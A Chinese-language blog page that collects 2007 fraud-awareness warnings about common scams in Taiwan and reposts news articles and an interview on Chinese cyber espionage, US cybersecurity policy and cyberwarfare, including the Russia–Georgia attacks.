  有台北市民众反应曾遭3名身分不详男子按电铃拜访,自称来自「台北市政府社会福利局」,为探访民隐,故前往协助台北市年满65岁以上者申请社会福利,并将於下次前来审查并确认後,发给渠父亲社会福利金(拨款至银行帐户内)。

  * 2007-09-18 15:57:53 补充

  发送卡奴救星信函,诱骗卡奴上钩

  林先生曾接到一封署名赵先生发出的卡奴救星信函,内容为代办优惠贷款,林先生将该广告信函回传後,遂接获1名富邦银行北一区行员来电,称需汇款15000元支付帐务处理费,被害人不疑有他,遂前往银行办理临柜汇款。

  * 2007-09-18 15:58:14 补充

  荼叶宅配诈骗

  诈骗手法挑选偏僻山区或独栋住宅,携带荼叶登门送货,谎称家人订购荼叶,并约定送货到家时当面付款,被骗人因无法向家人查证,或因相信送货人,随即交出5000元交付送货人。经被骗者向家人查证并未订货,且拆开包装内荼叶质地粗糙才发现被骗。

  * 2007-09-18 15:59:01 补充

  假徵信社诈骗

  报纸刊登广告,引诱被害人上门委托捉奸,以装监视器(装在外遇对象家中)、找法师作法求符咒、向法官行贿等理由,多次向被害人索费,被害人无法负担费用时,即带往银行办贷款支付,提告诉即解散公司并成立新公司,让被害人求偿无门。

  * 2007-09-18 15:59:07 补充

  假贷款真诈财

  本身是卡奴的陈小姐因接到一通「○○理财公司」业务来电,误信对方可助其解决卡债问题,遭对方以「语音约定转帐」方式骗走 200万,在追讨被骗款时,歹徒再以「操作错误需重新办理」为由,再汇出3万,陷入贷款诈骗陷井的她,在求助无门的情况下,才又陷入贷款诈骗陷井,她呼吁自已是因为被卡债逼疯了才会落入诈骗陷井。

  * 2007-09-18 15:59:30 补充

  假换钞真诈财

  嫌犯在进入超商时,一面接听�话,一面怒骂对方,先让年轻工读生产生紧张、恐惧感,再要求超商工读生先行将收银机内小钞确认後携回,并谎称能以所乘机车抵押为由,藉以取信被害人,并企图松懈被害人心防,於行骗得逞後,然後骑乘车辆扬长逃逸。

  * 2007-09-18 16:00:57 补充

  建议箴言:『天底下没有白吃的午餐』!!!


More......

加拿大研究声称中国黑客操控网络间谍

|

  加拿大研究人员日前声称,位于中国的一个巨大的电子间谍网络侵入103个国家的政府和私人电脑系统,试图盗走敏感资料。加拿大研究人员亦表示,没有证据显示中国政府参与了这些网络黑客活动。

  据英国广播公司(BBC)报道,加拿大多伦多大学电脑间谍甄别专家发现,在不到两年的时间里,这个电子间谍网络已通过间谍软件侵入100多个国家的1300台电脑。多伦多大学的信息战监督研究项目对据称是来自中国的网络间谍活动进行了长达10个月的跟踪研究。

  研究人员说,中国网络黑客侵入的电脑主要集中在达赖喇嘛办公室和亚洲国家政府的电脑。这个研究课题组称,有证据显示来自中国的黑客在被控制的电脑上安装了一种间谍软件,盗取敏感资料。这个课题组的研究是在达赖喇嘛指称他的办公室电脑曾遭中国网络黑客侵入后开始的。这个研究小组称,位于中国的网络黑客曾设法侵入过印度、巴基斯坦、德国、印尼、泰国、韩国和其它一些国家大使馆的电脑。

  研究小组称,来自中国的网络黑客曾侵入包括不丹、孟加拉国、拉脱维亚、印尼、伊朗、菲律宾等国的1295台电脑系统。据称,这些黑客在侵入电脑系统后安装间谍软件,试图获取电脑内的敏感资料。

  来源:星岛环球网


More......

“美国的顶级对手是俄罗斯和中国”――专访美国网络安全报告起草人James A. Lewis

| 2009年3月29日星期日

  From: http://www.infzm.com/content/24060

美国智库战略与国际研究中心高级研究员James A. Lewis,去年12月底主持完成了一份"美国网络安全"的报告,提供新上任的奥巴马政府作为决策参考。

  这份题为《在第44届总统任内确保网络安全》的96页报告,其中分析了世界主要国家的"网络战"攻防能力,结论之一,是美国、俄罗斯、中国占据了世界网络战力的三甲席位。Lewis分析,"俄罗斯的威胁在于数十年的经验,而中国则是因为它巨大的人力资源"。"作为美国的总统,必须了解来自网络的威胁,必须知道,如何应对。"报告中写道。

  六至七国网络战力突出

  南方周末:报告虽然没有涉及具体某个国家的名字,但媒体报道大量涉及中国和俄罗斯的网络攻击。你如何评估这两国的网络战能力?

  Lewis:首先要说,"网络攻击"并不准确,网络冲突并不导致像传统冲突和恐怖主义那样的物理性破坏,其巨大的利益在于经济间谍、军事间谍和科技间谍行为中的信息收集。

  据我所知,在网络空间,美国面临的顶级对手是俄罗斯和中国。俄罗斯的威胁在于数十年的经验,而中国则是因为它巨大的人力资源。

  南方周末:所以你认为美国、俄罗斯和中国是网络战能力最强的国家。

  Lewis:还有其他一些国家。英国、以色列、法国都很好。印度似乎不像其他这些国家这么活跃。很明显的是,这六七个国家在这场游戏中处于顶端。

  南方周末:有人认为,美国在网络空间远远比其他国家强大?

  Lewis:哦,我知道事实并非如此。坦诚地说,中国和俄罗斯跟我们一样好。还有法国和以色列,也许还有一两个国家,几乎跟我们一样好。这六七个国家的差距不大。

  南方周末:从公开信息可知,俄罗斯、法国、日本和台湾等国家和地区已经有了正式的"网络部队"。你如何评估它们的网络战能力?

  Lewis:台湾是比较活跃,它很成功,但它是一个小地方,我并不认为它有多大的能力。当然,有时你很难追踪,因为一些行为可能并非政府所为,可以来自某些私人的公司,更复杂的是,这些行为可能得到政府的支持。

  中国或能让全美断电一周

  南方周末:在俄格冲突期间,格鲁吉亚政府网站瘫痪,包括总统的网页被更改,一些银行的网页也受到入侵。但情况也仅限于此,并不那么严重。是不是说,网络战更多的是一种心理作用?

  Lewis:是的。它在告诉政府和个人,你读你的电脑时,你不知道还有谁也在读它。这将使你紧张。当然,一个国家对电脑和网络的依赖程度越高,它就在网络战中越脆弱。在这个意义上,网络战时,美国可能是全世界最脆弱的国家。

  南方周末:你能想象如果现在中美开打网络战,会是怎样的场景吗?

  Lewis:我想象过很多次。

  首先,两国都不想发生一场战争,即使是网络战。中国也许有能力入侵美国的电力系统,将全美的电力中断一周左右。这很糟糕,结果一定是一片混乱。因为一旦被美国发现,美国的反应未必是网络战,还有可能是更大规模的冲突。

  我告诉过美国军方领导,如果一旦发现中国大规模的网络袭击,比如对美国电力系统的袭击,那一定是他们在计划军事袭击了。除此之外,我很难想象两国为什么会冒险发动一场网络战。

  网络战堪比大规模杀伤性武器

  南方周末:按照这份96页的报告描述,美国在网络战中将会非常脆弱。人们认为你可能对网络战的风险有些夸大其辞。

  Lewis:我也听到有人说,放任网络恐怖主义,将把美国变成第三世界国家。我们仍然认为,网络安全主要是情报部门的问题,是信息安全的问题。但在这个角度上,美国正在受到损害。

  南方周末:在美国的国家安全战略中,网络安全排在第几位?

  Lewis:应该是前3名,至少是前5名。不单单是我在这么说,很多高层的领导都这么描述网络安全。

  南方周末:你认为网络是与大规模杀伤性武器,甚至核武器,可以等量齐观的威胁吗?

  Lewis:是的。大规模杀伤性武器很危险,我们曾经非常担忧,但它从未发生过;但网络攻击每天都在发生,这是更加现实的威胁。


More......

第一次网络世界大战会否打响?

|

  From: http://www.infzm.com/content/24078

"■网络战已经远超"把XX官方网站黑掉"的层次,而发展为通过互联网摧毁敌国电力、金融、通讯、作战指挥等关键系统的战争力量。 "

  "■美国、日本、法国、德国、印度等国家都已建立成编制的网络战部队。 "

  "■俄格冲突是世界上第一次大规模的网络战争。"

  "■第一次网络世界大战何时打响?中国网络战力有多强?。"

  美国,华盛顿特区。交通信号灯完全失灵,隧道中的汽车对开相撞,股市崩溃,通讯全部中断,所有的电视台播放着同一个画面――历任总统电视讲话的词汇片段被剪切在一起,拼凑成一篇恐怖的"黑客宣言"。

  这是电影《虎胆龙威4》里面的场景,几个黑客,就把美国折腾得天翻地覆。那么,在现实中,这样的事可能发生吗?信息安全专家和网络工程内部人士告诉南方周末记者,从理论和技术层面上,完全可能。

  事实上,网络空间里的战争,已经远远超出"把××官方网站黑掉"的层次,而发展为通过互联网摧毁敌国电力、金融、作战指挥等关键系统的战争力量。早在2007年,美国就成立了成建制的网络战部队,而俄罗斯,更对格鲁吉亚发动了世界上第一次大规模的网络战争。

  每一次敲击键盘,就等于枪击一发子弹;每一块CPU,就是一架战略轰炸机。据俄新社报道,美国国防部近日出台的一份报告称,世界网络大战已打响,美国成为其它国家主要打击目标,这"其他国家"就包括俄罗斯和中国。

  俄格冲突:第一场网络战

  实际上,去年8月的俄格冲突中,尽管俄罗斯否认采取了任何网络行动,但网络攻势与传统军事行动的结合,无疑对格鲁吉亚造成了更为沉重的打击,也使各国对网络战的重视程度达到了前所未有的新高度。

  早在冲突开始前,2008720日,一组诡异的信息数据流向了格鲁吉亚政府网站,其携带的信息为"win+love+in+Rusia"。伴随而来的,是短时间内以百万计的访问请求汹涌而来,使得格鲁吉亚政府网站瞬间瘫痪。

  专家们立即指出,这是典型的"分布式拒绝服务"(DDoS)攻击。在黑客攻击中,这是最为普遍而有效的手段之一。格鲁吉亚总统萨卡什维利的网页被多重DDoS攻击而瘫痪长达24小时。

  然而,相比88日俄罗斯对格鲁吉亚的大规模网络攻击,7月的这次网络冲突只能算是一次"带妆彩排"。

  随着俄军进入南奥塞梯,格鲁吉亚的网络再次受到大规模攻击。交通、通讯、媒体和银行的网站纷纷遇袭中招,政府网站系统更是全面瘫痪。甚至,在国家银行的网页上,格鲁吉亚总统萨卡什维利的照片被和希特勒等20世纪独裁者的照片挂在一起。

  格鲁吉亚几乎无法向外界有效发声,无奈之下,格鲁吉亚的外交部新闻只好发布在Google下的一个公共博客页面上;此外,萨卡什维利还无奈向波兰总统卡钦斯基求助,将新闻也发布在卡钦斯基的网页上。

  中国现代国际关系研究院信息与社会发展研究室副主任唐岚对南方周末记者指出,尽管格鲁吉亚遭遇的网络战,更多的是一种心理上的恐吓和威慑,但它是全球第一场与传统军事行动同步的网络攻击,具有独特的意义。

  美国:从"网络战士"到"网军"

  29日,奥巴马要求对美国的网络安全状况展开为期60天的全面评估。从去年年末起,美中经济与安全审查委员会、华府着名智库战略与国际研究中心以及美国国防部,都陆续推出了关于应对网络战、强化信息安全的研究报告。

  中国现代国际关系研究院安全与战略研究所副所长张力告诉南方周末记者,美国对互联网的控制程度已经远远超出了普通人的想象,"虚拟世界给我们的生活带来的冲击是'一个世界'的冲击,而不只是一个领域、一个部门……但这个世界里,从虚拟的领土,到各种技术手段基本上都是被美国牢牢地控制住的"。

  尽管美方的网络安全报告一再强调俄罗斯黑客的强大和中国信息产业的高速发展,但当英特尔、微软、思科等网络巨头频频以跨国公司的面目出现时,人们几乎忘记了它们身上的美国烙印。

  张力指出,美国信息安全系统"官民结合"的发展方式,使得一旦网络战爆发,美国政府将随时可以调用强大到可怕的IT巨头力量。

  美国甚至已经提出"网络威慑"的概念,独家垄断"信息霸权"的格局已经形成。

  1995年,美军就有16名"第一代网络战士"从美国国防大学信息资源管理学院诞生,他们肩负的使命,正是在网络空间与敌人展开全面信息对抗。

  2002年,布什政府抽调中央情报局、国家安全局和联邦调查局等核心机构,甚至盟国的顶级电脑天才,秘密组建了世界上第一支网络黑客部队――网络战联合功能构成司令部(简称JFCCNW)。

  2007年,JFCCNW正式进入美军作战序列,"网军"正式作为独立兵种应运而生。与此同时,"海军计算机应急反应分队",空军负责网络进攻的"第8航空队"等部队也全面组建,几乎所有的兵种都已经配备网络作战部门。

  另外,以预防"电子911"和"数字珍珠港"为名,在2006年和2008年,美国更是先后组织了"网络风暴I"和"网络风暴II"的网络战演习,模拟他国、恐怖组织和黑客发动网络攻击。演习中,全民皆兵。18个联邦机构协同作战,更是有思科和微软等40余家大牌科技企业参与。当然,出于安全保密需要,它们使用代号参与演习。其紧张程度,让参与者"连喝水的时间都没有",几乎成为现实版的"反恐24小时"。

  事实上,美国新任总统奥巴马已经将网络战威胁等同于核武器和生物武器对美国的威胁。2010年,美国将联合15国,展开规模空前的"网络风暴III"演习。

  网络暗战:美俄中角力?

  据本报记者了解,日本、法国、德国、印度等国家,甚至台湾地区,都已经把网络战的部队建制化、编制化。可以说,网络战的备战还是一场"隐蔽的斗争"。

  张力尤其指出,俄罗斯在网络安全意识方面的理念不亚于美国,非常超前。早在上世纪90年代,俄罗斯建立联邦国家安全会议时,就设立了信息安全委员会,已将其与经济安全等置于同等重要的位置。

  此外,俄罗斯优秀的数学基础教育和克格勃强大的情报工作班底,使得俄罗斯黑客早已蜚声全球。

  尽管如此,中国国内的信息安全专家和互联网业内人士却一致认为,全球范围内,还没有国家能单独与美国在网络战领域抗衡,包括被美国当作对手的中国和俄罗斯。"俄罗斯强大的黑客力量也只能是散兵游勇,可以组织小规模的网络攻防战,但也无力与美国的网络力量大规模对抗;而中国的网络战优势更多的在于人多、电脑多,在更高技术含量的网络对抗中不占优势。"一位要求匿名的高校教师告诉南方周末。

  究其原因,则在于美国对互联网产业的核心技术、产品和网络协议的垄断。IT巨头在产品中留有"后门"、收集用户信息等问题一直是人们争议的焦点。去年10月,"微软黑屏"事件让人们看到,如果需要,商业公司也完全做得更多――收集资料信息,强制执行其他指令,甚至破坏计算机和服务器的硬件。

  美国着名智库兰德公司已经提出"战略战"概念,即战争的顶级模式,其后果决定了一个国家的生死存亡。"工业时代的'战略战'是核战争,而信息时代的'战略战'就是网络战。"张力说。


More......